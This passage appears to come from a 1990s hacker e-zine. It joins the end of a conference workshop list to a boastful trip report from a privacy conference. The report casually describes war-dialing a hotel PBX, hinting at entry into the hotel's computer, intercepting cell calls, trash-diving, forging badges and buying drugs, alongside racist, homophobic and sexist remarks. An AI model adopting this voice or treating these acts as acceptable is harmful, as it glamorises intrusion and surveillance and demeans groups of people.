   governments know it. They want you to use locks that they have the
   key to. The fight is on!

'Virus about to destroy the earth!'. Don't believe the hype!
   What is the real threat of computer viruses? What technical
   possibilities are there? Are we being tricked by a fear-machine that
   runs on the money spent on anti-virus software?

'It came out of the sky'
   'Receiving pager information and what not to do with it'. Information
   to pagers is sent through the air without encryption. Rop Gonggrijp
   and Bill Squire demonstrate a receiver that picks it all up and
   present some spooky scenarios describing what one could do with all
   that information.

Cellular phones and cordless phones
   How do these systems work, what frequencies do they use, and what are
   the differences between different systems world-wide?

Zen and the art of lock-picking.
   In this workshop The Key will let you play with cylinder locks of all
   types and tell you of ingenious ways to open them.

"Doesn't mean they're not after you"
   The secret services and other paranoia.

Audio Adventures
   Steffen Wernery and Tim Pritlove talk about adventure games that you
   play using a Touch Tone telephone.

Botanical Hacking (THC++)
   Using computers, modems and other high tech to grow.

Wireless LAN (Data Radio)
   How high a data rate can you pump through the air, and what is still
   legal?

Social Engineering
   The Dude, well known from his articles in Hack-Tic, will teach you
   the basics of social engineering, the skill of manipulating people
   within bureaucracies.

'Hacking Plastic'
   Tim and Billsf talk about the security risks in chip-cards, magnetic
   cards, credit cards and the like.

Antenna Host Demo
   The Antenna Foundation is setting up and supporting computer
   networks, mainly in the South. They are operating a host system in
   Nijmegen, The Netherlands, and they will demonstrate it in this
   workshop, and talk about their activities.

APS Demo
   APS (Activist Press Service) is operating a bbs in Amsterdam, The
   Netherlands. You'll see it and will be able to play with it
   'hands-on'.

'Hocking the arts'
   Benten and Marc Marc are computer artists. They present some of their
   work under the motto: Hocking the arts, demystifying without losing
   its magic contents.

Public Unix Demo
   Demonstrating the Hack-Tic xs4all public unix, as well as other
   public unix systems.

Packet Radio Demo
   Showing the possibilities of existing radio amateur packet radio
   equipment to transport packets of data over the airwaves.
=========================================================================

COMPUTERS AT 'HACKING AT THE END OF THE UNIVERSE'

This will get a little technical for those who want to know what we're
going to set up. If you don't know much about computers, just bring
whatever you have and we'll see how and if we can hook it up.

We're going to have ethernet connected to Internet (TCP/IP). You can
connect by sitting down at one of our PC's or terminals, by hooking up
your own equipment (we have a depository, so don't worry about theft),
or by using one of our 'printerport <--> ethernet' adapters and
hooking up laptops and notebooks that way. There may be a small fee
involved here, we don't know what they're going to cost us. Contact us
for details, also if you have a few of these adapters lying around.
There might also be serial ports you can connect to using a nullmodem
cable.

You can log in to our UNIX system(s) and send and receive mail and
UseNet news that way. Every participant that wants one can get her/his
own IP number to use worldwide. Users of the network are urged to make
whatever files they have on their systems available to others over the
ethernet. Bring anything that has a power cord or batteries and let's
network it!
=========================================================================

--
Hstorm ++31 2230 60551
Ad Timmering <north@hstorm.hacktic.nl>

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 8 of 27

                                CONFERENCE NEWS
                                    PART II

****************************************************************************

Fear & Loathing in San Francisco

By Some Guy

(The names have been changed to protect the guilty.)

1. The Arrival

I had been up for about 48 hours by the time America West dropped
me off at San Francisco's airport.  The only thing I could think about
was sleep.  Everything took on strange dreamlike properties as I staggered
through the airport looking for the baggage claim area.  Somehow, I
found myself on an airport shuttle headed towards the Burlingame
Marriott.  Suddenly I was standing in front of an Iranian in a red
suit asking me for a major credit card.  After a quick shuffle of forms
at the checkin counter I finally had the cardkey to my room and was
staggering toward a nice warm bed.

Once in the room I fell down on the bed, exhausted.  Within the space of a
few minutes I was well on my way to Dreamland.  Within the space of a few
more minutes I was slammed back into reality as someone came barreling into
the room.  Mr. Blast had arrived from Chitown with a bag full of corporate
goodies.  I accepted a shirt and told him to get lost.  No sooner had he left
than Fitzgerald burst in with enough manuals to stock a small college's
technical library.  After griping for nearly 30 minutes at the fact that
I had neglected to likewise bring 500 pounds of 5ess manuals for him,
Fitzgerald took off.

Sleep.

2. Mindvodxka

After several needed hours rest, I took off downstairs to scope out the
spread.  I ran into Bruce Sterling who relayed some of the mornings
events, the highlight of which was Don Delaney's "Finger Hackers"  the
inner city folks who sequentially dial, by hand, every possible combination
of pbx code to then sell on street corners.

Out of the corner of my eye I spotted two young turks dressed like
mafioso:  RBOC & Voxman.  I wandered over and complimented them on their
wardrobe and told them to buy me drinks.  Beer.  Beer.  More beer.
Screwdrivers.  Screwdrivers.  Last call.  Last screwdriver.

RBOC and I decided that it was our calling to get more drinks.  We took
off to find a bar.  Upon exiting the hotel we realized that we were in
the middle of fucking nowhere.  We walked up and down the street, rapidly
getting nowhere.  In our quest for booze, we managed to terrorize a
small oriental woman at a neighboring hotel who, after 10 minutes of our
screaming and pounding, finally opened up the door to her office wide
enough to tell us there were no bars within a 15 mile radius.
We went back to the hotel very distraught.

We went back to RBOC's room where Voxman was sampling a non-tobacco smoke.
We bitched about the lack of watering holes in the vicinity, but he was
rather unsympathetic.  After he finished his smoke and left the room, we
decided to order a bottle of vodka through room service and charge it
to Voxman since it was roughly 50 dollars.

RBOC called up room service and started to barter with the clerk about the
bottle.  "Look, tell you what," he said, "I've got twenty bucks.  You meet
me out back with two bottles.  I give you the twenty and you keep one of
the bottles for yourself."

"Look man, I know you have about a thousand cases of liquor down there,
right?  Who's going to miss two bottles?  Don't you want to make a few
extra bucks?  I mean, twenty dollars, that's got to be about what you make
in a day, right?  I mean, you aren't exactly going to own this hotel any
time soon, am I right?  So, I'll be down in a few minutes to meet you
with the vodka.  What do you mean?   Look man, I'm just trying to help out
another human being.  I know how it is, I'm not made out of money either,
you know?  Listen, I'm from NYC...if someone offers me twenty dollars
for nothing, I take it, you know?  So, do we have a deal?"

This went on for nearly an hour.  Finally RBOC told the guy to just bring up
the damn bottle.  When it arrived, the food services manager, acting as
courier, demanded proof of age, and then refused to credit it to the room.
This sparked a new battle, as we then had to track down Voxman to sign
for our booze.  After that was settled, a new crisis arose:  We had no
mixer.

The soda machine proved our saviour.  Orange Slice for only a dollar a
can.  We decided to mix drinks half and half.  Gathering our fluids,
we adjourned to the lobby to join Voxman and a few conventioneers.
The vodka went over well with the crew, and many a glass was quaffed
over inane conversation about something or other.

Soon the vodka informed me it was bed time.

3. It Begins.

I woke late, feeling like a used condom.  I noticed more bags in the room
and deduced that X-con had made it to the hotel.  After dressing, I staggered
down to the convention area for a panel.

"Censorship and Free Speech on the Networks" was the first one I got to
see.  The main focus of the panel seemed to be complaints of alt.sex
newsgroups and dirty gifs.  As these two are among my favorite things
about the net, I took a quick disliking of the forum.  Nothing was resolved
and nothing was stated.

There was a small break during which I found X-con.  We saw a few feds.
It was neat.  The head of the FBI's computer crime division called me by name.
That was not terribly neat.

The next session was called "Portrait of the Artist on the Net."  X-con
and I didn't get it.  We felt like it was "portrait of the artist on
drugs on the net."  Weird videos, odd projects, and stream of
consciousness rants.  Wasn't this a privacy conference?   We were confused.

The session gave way to a reception.  This would have been uneventful had
it not been for two things:  1) an open bar 2) the arrival of the Unknown
Hacker.  U.H. was probably the most mysterious and heralded hacker on
the net.  The fact that he showed up in public was monumental.

The reception gave way to dinner, which was uneventful.

4. Let the Beatings Begin

A few days before the con, Mr. Blast had scoured the net looking for
dens of inequity at my behest.  In alt.sex.bondage he had run across
a message referring to "Bondage A Go-Go."   This was a weekly event at
a club in the industrial district called "The Bridge."  The description
on the net described it as a dance club where people liked to dress up
in leather and spikes, and women handcuffed to the bar from
9-11 drank free!  This was my kind of place.

On that Wednesday night, I could think of nothing but going out and
getting to Bondage A Go-Go.  I pestered X-con, Mr. Blast and U.H. into
going.  We tried to get Fender to go too, but he totally lamed out.
(This would be remembered as the biggest mistake of his life.)

We eventually found ourselves driving around a very seedy part of
San Francisco.  On one exceedingly dark avenue we noticed a row
of Harleys and their burly owners hanging outside a major dive.  We
had found our destination.

Cover was five bucks.  Once inside we were assaulted by pounding
industrial and women in leather.  RAD!  Beer was a buck fifty.
Grabbing a Coors and sparking a Camel, I wandered out to the main dance
floor where some kind of event was taking place.

Upon a raised stage several girlies were undulating in their
dominatrix get-ups, slowly removing them piece by piece.  A smile
began to form.  X-con and U.H. found me and likewise denoted their
approval.  The strip revue continued for a few songs, with the
girlies removing everything but their attitudes.

The lights went up, and a new girl came out.  She was followed by a
friend carrying several items.  The first girl began to read rather
obscure poetry as the second undressed her.  Once girl1 was free
of restrictive undergarments girl2 donned surgical gloves and
began pouring generous amounts of lubricant over her hands.  As the
poetry reached a frantic peak, girl2 slowly inserted her entire hand
into girl1.

A woman in the crowd screamed.

My smile was so wide, it hurt.

The fisting continued for an eternity, with girl1 moving around the stage
complaining in her poetic rant about how no man could ever satisfy her.
(This was of no surprise to me since she had an entire forearm up her twat.)
Girl2 scampered around underneath, happily pumping away for what seemed like
an hour.

When the performance ended, a very tall woman in hard dominatrix gear
sauntered out on the stage.  From her Nazi SS cap to her stiletto heels
to her riding crop, she was the top of my dreams.  Two accomplices tied
a seemingly unwilling bottom to the stage and she began striking
her repeatedly with the crop, to the beat of something that sounded like
KMFDM.  The screams filled the club, and drool filled the corners of my
mouth.

As the song ended, the girls all came back out on stage and took a bow
to deafening applause.  Then the disco ball lit up, and Ministry began
thundering, and people began to dance like nothing had ever
happened.  We were a bit stunned.

We all wandered up to the second level where we were greeted by a guy and
two girls going at it full on.  I staggered dazed to the second story on the
opposite side.  There was a skinhead getting a huge tattoo and a girl
getting a smaller one.  I was not brave enough to risk the needle in
San Francisco, so I wandered back downstairs.  That's where I fell in love.

She was about 5'2", clad in a leather teddy, bobbed blood red hair, carrying
a cat o'nine tails.  Huge, uh, eyes.  Alas, 'twas not to be.  She was
leading around a couple of boy toys on studded leashes.  Although the
guys seemed to be more interested in each other than her, I kept away,
knowing I would get the hell beaten out of me if I intervened.

As it approached 3:00 am, we decided it was time to go.  We bid a fond
farewell to the Bridge and took leave.

We all wanted to see Golden Gate, so U.H. directed us towards downtown
to the bridge.  Passing down Market, we noticed a man lying in a pool of
blood before a shattered plate glass window, surrounded by cops.

We eventually reached the Golden Gate Bridge.  We drove across to the
scenic overlook.  Even in the darkness it was rather cool.  We took off
through the hills and nearly smashed into a few deer with the car.
It was almost time for the conference by then, so we decided to get back.

5. Thursday

I made it downstairs for the "Medical Information and Privacy" that
morning.  As I was walking towards the room, I got a sudden flash of
an airlines advertisement.  The Pilot had arrived.  I was shocked.
Here was this guy who used to be one of the evil legionnaires, and he
looked like an actor from a delta commercial...blue suit, aviator
sunglasses, nappy hat with the little wings.  Appalling.

I drug him into the meeting hall where we sat and made MST3K-like
commentary during the panel.  I began to get mad that no one had
even mentioned the lack of legislation regarding medical records privacy,
nor the human genome project.  I was formulating my rude commentary
for the question period when the last speaker thankfully brought
up all these points, and chastised everyone else for not having done
so previously.  Good job.

I snaked The Pilot a lunch pass, and we grabbed a bite.  It was pretty
good.  I noticed that it was paid for by Equifax or Mead Data Central
or some other data-gathering puppet agency of The Man.  No doubt a
pathetic ploy to sway our feelings.  I ate it anyway.

After lunch, John Perry Barlow got up to bs a bit.  The thing that stuck me
about Barlow was his rant about the legalization of drugs.  Yet another
stray from computers & privacy.  It must be nice to be rich enough to
stand in front of the FBI and say that you like to take acid and think
it ought to be legal.  I debated whether or not to ask him if he
knew where to score any in San Francisco, but decided on silence, since
I'm not rich.

I lost all concept of time and space after Barlow's talk, and have no idea
what happened between that time and that evening.

6. Birds of a Feather BOF together

That night we went to the Hacker BOF, sponsored by John McMullen.
Lots of oldies siting around being superior since it wasn't illegal
when they swiped cpu access, and lots of newbies sitting around feeling
superior since they had access to far better things than the oldies
ever dreamed of.

A certain New York State Policeman had been given the remainder of the
bottle of vodka from the previous night.  It was gone in record time.
Later he was heard remarking about how hackers should get the death
penalty.  When Emmanuel Goldstein demonstrated his Demon Dialer from
the Netherlands, he sat in the corner slamming his fist into his hand
muttering, "wait till we get home, you'll get yours."

I went outside and hid.  Also hiding outside was Phiber.  We exchanged a
few glares.  He and I had been exchanging glares since our respective
arrivals.  But neither of us said anything directly to the other.
I had heard from several people that Phiber had remarked, "on the third
day, I'm gonna get that guy.  Just you wait."  I was waiting.

I decided that Thursday should be the night we would all go to a
strip club.  After telling everyone within a 15 mile radius about
Bondage A Go-Go, it was rather easy to work up an interest in this
adventure.  Me, X-con, Mr. Blast, U.H. and Fender would be the
valiant warriors.

Before making preparations to leave, X-con and Fitzgerald decided to
check out the hotel's PBX.  Setting up Tone-Loc, X-con's notebook
set out banging away at the available block of internals.  We
decided that the hotel had a 75, and yes, it would be ours, oh yes,
it would be ours.

It was a Herculean task to gather the crew.  Despite their desire to go,
everyone farted around and rounding them up was akin to a cattle
drive.  Fender cried about having to attend this BOF and that BOF and
Mr. Blast cried about being tired, Fitzgerald cried about not being
old enough to go, and I just cried.  Eventually we gathered our
crew and launched.

8.  Market Street Madness

We initially went out to locate the Mitchell Brothers club.  I had heard that
it was quite rad.  Totally nude.  Lap dancing.  Total degradation and
objectification.  Wowzers.

U.H. said he knew where it was.  He was mistaken.  The address in the
phone book was wrong.  It was nowhere to be found.  We ended back up
on Market surrounded by junkies and would-be muggers.  Thankfully,
there were no fresh corpses.  I saw a marquee with the banner Traci Topps.

Forcing Mr. Blast to pull over, we made a beeline to the entrance.
Cover was ten dollars, and we had missed Traci's last performance.
We paid it anyway, since we had bothered to pull over.  Big mistake.

Now, when I think of strip clubs, I think of places like Houston's
Men's Club, or Atlanta's Gold Club, or Dallas' Fantasy Ranch.  Very
nice.  Hot women.  Good music.  Booze.  Tables.

We entered a room that used to be a theater.  Sloping aisles along
theater seats side by side.  Up on the stage, was a tired, unattractive,
heavy set brunette slumping along to some cheesy pop number.
I was instantly disgusted.  I felt compelled to tell X-con that strip
clubs were not like this normally, since he had never been to one, and
it was my bright idea to be here.

We noticed some old perv at the far end of our row in a trench.  It was
like out of a bad movie.  He was not at all shy about his self-satisfaction
and in fact seemed quite proud of it.  He kept trying to get the girls to
bend down so he could fondle them.  Gross beyond belief.  We debated
whether or not to point and laugh at him, but decided he might have
something more deadly concealed under the trench and tried to ignore it.

Some more furniture passed across the stage.  One sauntered over to me
and asked if I'd like any company.  I asked her what the hell this place
was all about.  She said that this was the way most places were downtown.
I told her that I expected tables, beer, and a happy upbeat tempo.  She
shrugged and said she didn't know of anything really like that.

On the stage a really cute girl popped up.  A shroom on this turd of a club.
Fender and I both decided she was ours.  Fender said there was no way that
I would get the only good looking girl in the place.  I said he needed to
get real, that it would be no contest.

As soon as she left the stage, Fender disappeared.  Later he returned
smirking.  Moments afterward, the girl appeared and plopped down in his lap.
(We found out later he paid her.)  He continued his dialogue for about
20 minutes discussing philosophy or something equally stupid to talk
to a nude dancer about, and then we got up to leave.  She gave him her
phone number.  (It was the number to the Special Olympics.)  We left,
and I apologized to everyone.

We took off to Lombard street and fantasized about letting the rental
car loose to plummet down the hill, destroying everything in its
path.  Next time we decided we would.

Then it was decided that it would be a good idea to look for some food.
We ended up somewhere where there was some kind of dance club.
Everything was closed and there was no food to be seen.  Walking down
a few side streets looking for food, U.H. decided to tell Fender that
he had broken into his machine.  Fender turned about 20 shades of green.

We then went back to the Golden Gate Bridge since it never closed and
stared out at the bay.   Fender began to talk incoherently so it
became urgent that we get back to the hotel and put him to bed to dream
happy dreams of his stripper Edie.

Back at the hotel X-con and I could not sleep.  The notebook had found
a number of carriers.  One was for a System V unix.  We decided that
this was the hotel's registration computer.  We knew most used some kind of
package like encore, so we...well.  :)  We also found several odd systems,
probably some kind of elevator/ac/power controllers or whatnot.

At 5am or so, X-con and I took off to explore the hotel.  Down in the lobby we
found RBOC busily typing away to a TTD operator on the AT&T payphone 2000.
He was engrossed in conversation, so we left him to his typing.
X-con started to look around the Hertz counter for anything exciting and
set off the alarm.  Within seconds security arrived to find me
perched on the shoeshine stand and X-con rapping on the payphone to
another hotel.  We told him we hadn't seen anyone go behind the counter.
He didn't believe us but left anyway.

As we burst into fits of laughter, Mitch Kapor, in shorts and t-shirt came
cruising by and exited through a glass door.  We weren't quite sure if he
were real so we snuck through the door after him.  The door led to the
gym.  Mitch was busily pedaling away on an exercycle.

X-con and I decided to explore the hotel since we never even knew there
was a gym, and who could tell what other wild and wacky places remained
unseen.  We took off to find the roof, since that was the most obvious
place to go that we should not be.  Finding the stairwell with roof access,
we charged up to the top landing.  The roof was unlocked, but right before
opening the hatch, we noticed that there was a small magnetic contact
connected to a lead.  Not feeling up to disabling alarm systems so
late in the evening (or early in the morning), we took off.
On another level, we found the offices.  Simplex locks.  Amazing.
Evil grins began to form, but we wimped out, besides it was damn near
convention time.

9.  Coffee, Coffee and More Coffee

Outside the convention room the caterers had set up the coffee urns.
X-con and I dove into the java like Mexican cliff jumpers.  It got
to be really really stupid.  We were slamming coffee like there was no
tomorrow.  Fuck tomorrow, we slammed it like there was no today.
I put about eight packets of sugar in each of my cups.  Ahh, nothing like
a steamin' cup o' joe.  By the time we were done we had each drank
nearly 20 cups.  The world was alive with an electric hum.  We were ready
to take on the entire convention.  Yep.  After another cup.

The first panel of the day was "Gender Issues in Computing and
Telecommunications."   As the talk began, the pig in me grew restless.
"What's all this crap?" it said.  "Bunch of feminazis bitching about
gifs.  They should all go to the bridge next Wednesday, that will give them
a new perspective.  Where's Shit Kickin' Jim when you need him?"
Then I got more idealistic in my thinking.  "Ok, fine, if women
demand equal treatment on the net, then what about equal treatment for
homosexuals?  What about equal treatment for hermaphrodites?  What about
equal treatment for one-legged retired American Indian Proctologists on
the net?  And let us not forget the plight of the Hairless.  Geez.  What
a load of hooey.   I wanted to jump up and yell, "THE NET IS NOT REAL!
WORRY ABOUT THE REAL WORLD AND THE NET WILL CHANGE!  YOU CANNOT CHANGE
REALITY BY CHANGING THE NET!"  If only I'd had another cup of coffee, I might
have done it.

The women got nothing done.  After the panel X-con and I took off to the
room, after getting a few cups of coffee for the elevator ride.  We sat
in the hotel room and made rude noises until Mr. Blast and Fitzgerald
got up.  We all fought for the shower and by noon we were ready to
venture outward for lunch.

10. Cliffie!

The lunch that day had a few pleasant surprises.  The first came in the
form of a waitress with HUGE, uh, eyes.  Having something of an
fetish for big, ahem, eyes, I practiced my patented Manson-like gaze
for her benefit.  The second surprise came when a the CFP staffers
cornered a couple of people at our table.

KCrow and Xaen had photocopied lunch tickets and forged badges to hang
out at the conference.  Finally, on the last day, the staffers suddenly
decided that these two might not be paying attendees.  Whether it was
the names on their badges that did not check out, or the fact that
Xaen had been walking around in a red and white dress-like robe the entire
day.  They let them stay, but told them next time to either make better
forgeries or send in their scholarship applications like everyone else.

As lunch drew to a close, the crowd grew restless.  A cry rang out,
"CLIFFIE!"  The crowd took up the cry, and executives began throwing
conference papers in the air, stomping their feet and holding up
their lit cigarette lighters.  "We want Cliffie, we want Cliffie!"
The house lights dimmed and a silhouette of frazzled hair appeared at the
head of the room.

Well, maybe it wasn't quite like that.  Cliff Stoll took the stand and
began a stream of consciousness rant that would make someone with a bipolar
disorder look lucid.  Contorting himself and leaping on tables, Cliff
definitely got my attention.  It was kind of like watching Emo Philips
on crank while tripping.  I dug it.  If you have the opportunity
to catch Cliff on his next tour, make sure to do so.  Lorne Michaels could
do worse than make some kind of sitcom around this guy.  It was
probably the most amazing thing I had seen at the official conference.

11. A Little Bit O' History

Fitzgerald heard that there was a Pac Bell museum downtown.  This news
evoked a Pavlovian response almost as pronounced as me at The Bridge.
Me and The Pilot wanted to check it out too so we decided to go.
It was like the Warner Bros. cartoon of the big dog and the little dog
"huh Spike, we gonna get us a cat, aren't we Spike, yep, we are gonna get
that cat, boy, aren't we Spike, yep, yep, boy I can't wait, boy is that
darn cat gonna be sorry, isn't he Spike, huh, Spike, huh?"  Fitzgerald
was psyched.

Driving through downtown San Francisco was kind of like some kind of
deranged Nientendo game.  The streets were obviously layed out by farm
animals.  Traffic was disgusting.  Of course, 3:30 on Friday afternoon
is official road construction time in downtown San Francisco.  That was
not in my "Welcome To SF" guide, so I penciled it in.

About 4:00 we found an open lot, amazingly enough across from the
Pac Bell building.  We paid roughly 37 thousand dollars for the spot and
took off to the museum.  Fitzgerald was in heaven.  He had called the
museum from the hotel before we left and told them we were on our way.

Upon walking in the building we were stopped by a guard.  He asked us what
we wanted.  Fitzgerald said, "We're here for to see the museum!"  The
guard gave us the once over and said, "Museum's closed."  Fitzgerald
almost fainted.  Sure enough, the museum guy had bailed early.  Probably
immediately after receiving our phone call.  Typical telco nazi antics.

We took to the streets.  (The streets of San Francisco...haha)  Wandering
up and down the hills checking people out proved quite fun.  We checked out
Chinatown where we all decided that the little Oriental schoolgirls in their
uniforms were quite amazing.  We tried to spot the opium dens, and pointed
out suspect organized crime figures.  Suddenly, we realized we were lost,
and if we didn't get back to the lot we would lose our car.  (Thirty-seven
thousand dollars only buys you a spot for a few hours.)  We managed to
find our car minutes before the tow trucks rolled in and spent
a few more hours looking for buildings with good dumpsters for that night's
planned trashing spree.  We found a few spots and took off towards the
hotel and dinner.

12. Zen & The Art of Trashing

That night everyone decided to move into our room.  Somehow Fitzgerald stole
a bed and wheeled it into our room to allow for more sleep space.  So, it was
X-con, Fitzgerald, me, Fender and Mr. Blast all smashed into the little
room.  As we were sitting in the room discussing what to do that
evening, the door burst open and a large man in basketball sweats walked
in.  After he saw us in the room he turned around and quickly exited.

Fitzgerald ran out in the hall after him and discovered that the whole hall
was full of basketball players.  We called down to the front desk to complain
that our room had been given out.  The desk apologized and told us that the
mistake had been noticed and they would correct the problem with the
basketball team.  This did not exactly sit well with me, as I envisioned
shitloads of jocks rooting through our stuff, taking my camera and
various and sundry electronics gear.

Temporarily forgetting about the impending robberies, we took off to do
a little recon of our own.  The five of us and The Pilot piled into
two cars and took off towards downtown looking for garbage.

We found several Pac Bell offices but the only one with any type of
dumpster had nothing to offer save old yellow pages and pizza boxes.
We were totally bummed.  We decided to wander around aimlessly
to see what we could stumble across.

After making about a dozen turns and walking a mile or two we came across
a huge black beast of a building.  It looked like the Borg Cube.  It was
vast and foreboding.  It was an AT&T building.  Fitzgerald took off
towards the door to ask for a tour.  It was only 11:00 in the evening,
so we were certain that we would be given a hearty welcoming and
guided journey through the bowels of the cube.  Yeah, right.

Alas, we were not to be assimilated.  The guard told us to get lost.
We decided to see the Borg used dumpsters.  Around the back end of the
building by the loading docks we saw several stair landings starting about
three floors up.  We debated scaling the building, but noticed about
500 security cameras.  This place was possibly the most secure telco
installation we had ever seen.

We decided that this place must be the point of presence for the West Coast
since it was just so damn impenetrable.  As we turned to leave I noticed a
small piece of white cord on the ground.  As I picked it up, we noticed it
led from a small construction shack behind the POP.  It ran all the way
from the shack to a heavy steel door in the side of the cube where it
snaked its way under the door into the building and probably into the
frame.  We all had a great laugh at the exposed line, and wished we
would have had a test-set to make a few choice overseas calls.

We wandered back to the cars and ended up driving around downtown some
more for a few hours before ending up back at the hotel.

13.  Mr. Blast Can't Drive.

We all regrouped the next morning to go shopping downtown.  Fender was kind
enough to dish out vast quantities of chocolate-covered espresso beans
and we all got completely wired.  X-con and I decided that we should have had
a bag of these the previous morning.

We drove straight down to Chinatown and began looking for a place to park.
Mr. Blast, Fender, X-con were in one car, me, Fitzgerald and The Pilot
in another.  Mr. Blast, for being from a huge city, had absolutely no
concept of driving in traffic in a downtown setting.  He missed lots,
made weird turns, ran lights and generally seemed like he was trying
to lose us.  He achieved his desired goal.

We cursed his name for fifteen minutes and then gave up our search.
Fitzgerald had swiped Fender's scanner and was busily entertaining
himself listening to cellular phone calls.  He had the window rolled down
in the back seat and took great joy in holding up the scanner so people
walking down the street could join in on the voyeuristic fun.  Suddenly
Fitzgerald shouted, "HOLY SHIT!  I can't believe it!"

The Pilot and I nearly had matching strokes, "WHAT?" I said.  "It's
ENCRYPTED!  I can't believe it man, encrypted speech on the phone!"
I began to laugh, and The Pilot soon joined in.  It was Mandarin.
"Where the hell are we, Fitz?"  I asked him.  "San Francisco, " he replied.
"No," I said, "Specifically, where in San Francisco?"  Fitzgerald
thought for a minute and said, "Uh, Chinatown?"  Suddenly, his eyes
lit up, "OHHHHHHH.  Hehe..  it's not encrypted is it?"  We laughed at him
for about ten minutes.

We came to a stop light where a very confused Chinese lady was looking
at us.  Fitzgerald held up the scanner and I yelled, "Herro!"  We
went hysterical as we drove off, leaving the woman even more bewildered.

We found a place to park and decided to explore on our own.  The plethora
of little Chinese hotties blew my mind.  We staggered around Chinatown
trying to get bargains on electronics gear.  It struck us all as odd
that every electronics store in the downtown area was owned and
operated by Iranians.  Needless to say, no bargains were found.

We had lunch at a restaurant called Red Dragon.  The majority of the
lunch was spent talking telco.  Watching Fitz and The Pilot get totally
wrapped up in the talk, both trying to tell the best story about the
neatest hack proved incredibly interesting.

We took off into the crowds to try to find cheap watches, since The Pilot's
watch was ready to retire.  He soon made a totally sweet deal on a watch
from an oriental merchant and we took off for the car.  On the way we noticed
a small shop in a back alley with throwing stars in the window.

Inside was ninja heaven.  They had daggers, cloaks, stars, nunchaca,
swords, masks and tons and tons of violence inducing paraphanalia.  I saw
a telescoping steel whip behind a case.  I knew I must possess this item,
and when I found out that it was only $22.00 the money was already in
my hands.  Fitz also got a whip and five stars.  We were now armed...Phiber
beware.

We took off down to the port to look out at the bay.  While we were there
we watched a bunch of skaters doing totally insane street style in a small
cement fountain area.  One kid waxed the street with his face and we all
had a serious laugh, much to the chagrin of the injured and his posse.
As soon as they scraped up the hapless skatepunk off the ground,
they resumed their thrashing, avoiding the wet spot.  We decided
that these kids were totally insane.

We took off back to the hotel to meet up with the idiots.  Once we arrived
we found that we were locked out of our room.  In fact, not only had they
cut off our keys, but they had checked us out.  We got a security guard
to let us in the room.  Shortly thereafter X-con et.al. returned loaded
with gear they had picked up on their trip.  They exclaimed that they
rushed back to the hotel at top speed, since when they tried to call the
room, the hotel had said that our room was not in use.

I got furious and went downstairs to yell.  Eventually, we got our phone
service back and the manager went upstairs to give us a live body to
verbally abuse, which we took full advantage of.  He shucked and jived
his way through an apology but we did not get a free night as we had
hoped for.

14. Castro-Bound

X-Con wanted shoes.   We all sorted out the card key mess and piled back in
The Pilot's car and headed out to find NaNa's.  As we drove towards
the store we noticed something change about the city.  The fog lifted.
The colors got more pastel.  The men walking down the street seemed to
have more spring in their step.  We had entered the Castro.

I really wanted to hit a record store in the Castro because homos always
seem to have cool dance music.  I convinced everyone that we should pull
over and risk a quick walk down the main drag.

The stroll was a complete farce.  Our crew seemed to be extremely
apprehensive.  To make them more edgy I took great glee in talking
real nelly and batting my eyes at anything that moved.  No one was amused.
In fact, Fitzgerald and the Pilot looked like they wanted to cry and run
back to the car and hide.

None of the record stores had anything good.  There were lots of old
Judy Garland and Ethyl Merman but nothing more modern than the
Village People.  (And I was expecting techno.  But noooooo...)

On our way back to the car we passed by a leather goods store.  Not
exactly Tandycraft, if you get my drift.  X-con was the only one
brave enough to go in.  He came out looking drained of all color holding
a catalog.

"There were these three guys in there," he stammered.  "One of them was
being fitted for a cock sheath.  The two other guys kept showing him
different ones, but he said they were too big."

We all shuddered and hastened our return to the car.

We drove a few miles more down the street and ended up at the NaNa's shop.
The store was your typical alternative grunge-wear shop.  Stompin'
boots, nifty caps, shirts by Blunt.  X-con got his shoes.  We all got
nifty caps.  Leaving for the hotel, I grabbed a handful of flyers from
the front window.  Most were rave flyers for the next weekend.  One however
was announcing a bondage party for 'women only' two days later.  I felt a
tear begin to form as I reminisced about the Bridge.

15. Hating It In The Height.

We regrouped back at the hotel and took off again for the Height to go
check out Rough Trade records and see what could be seen.  And X-con
and I needed a few tabs.  (YEEE!)  We needed these rather badly since
Mr. Blast had found out about a rave that evening from the SF-RAVES
mailing list.  There was no way X-con and I could sit through a rave
sober, and dancing was WAY out of the question.

Rough Trade was closed.

We decided to grab a quick bite to eat while waiting for information
on the rave.  We decided to try something really odd, since we weren't in
for the typical corporate burger scene.  A bit down the street from
Rough Trade we happened upon a Ethopian restaurant.  Since this was about
as obscure as any of us had ever dreamed, we decided to check it out.
I personally didn't think Ethopians ever had any food, and made a few jokes
about wanting something light, so this would definitely be the place.

Ethopian food was odd.  Looking over the menu, Mr. Blast decided that
he didn't want much of anything they had to offer.  We decided that we
should buy a lot of everything and just pick and choose.  I made the
comment that I would only eat chicken, and Mr. Blast didn't like the
idea of eating much of anything everyone wanted to try.  We ordered
separately.

The food came out in a rather odd fashion.  Everything was piled on top
of everything else.  It was all splattered on top of a weird pancake-like
sponge bread.  There were all manner of sauces to smother, dip, or otherwise
destroy the entrees with, so we all took great bravado in our sampling of
each.  It was quite a fantastic spread, and I wholeheartedly urge everyone
to check out this particular cuisine.

After the meal we took off to find a phone to call the raveline.  On our
way to the phone X-con and I stumbled across a few transients who offered
us acid at a remarkable price.  This was almost too good to be true.
We slunk down a side street and bs'ed with the homeless couple as we
decided how many to buy.  We settled on 20 hits for 45 dollars.  X-con
and I were psyched.  The rave would indeed be tolerable.

We hooked up with the crew, smiling like Cheshire cats.  Mr. Blast had
the directions to the rave so we took off ready to overindulge.
By the time we reached the rave, we were one of what seemed like
a hundred or two hanging outside of a warehouse.  This might be
pretty damn cool.  X-con and I began our dosing.

Now, usually I love the first contact of the blotter with my tongue.
It evokes a certain tangy taste, akin to touching a battery to the tip
of your tongue.  It always gets the adrenaline flowing, and brings
back memories of what will soon be repeated.

Nothing.

I looked at X-con.  "Dude," he said, "I can't taste shit.  I better
take more."  He dropped about 3 more.  Still no taste.  I ate a few more
myself in a futile hope that some lysergine substance may have once resided
in the fibers of the blotter.  Nope.

This was the beginning.

As we waited to be let in to the warehouse, cursing the transients, the sirens
begin to wail.  Fucking great.  Five police cars swept into the cul-de-sac
that led to the warehouse.  The rave would not be in this location.  Everyone
bailed like rats from a sinking ship, yelling that the rave would be
moved to a soon to be announced location.

Now X-con and I were really pissed.  I whipped out my steel whip and said,
"Let's go pay a quick visit to the Height and visit our friends."
We piled back into the cars and set out to do some serious damage.

Arriving in the Height we noticed that cops were everywhere.  This was not
going to be easy.  X-con and I set out like men possessed.  The transients
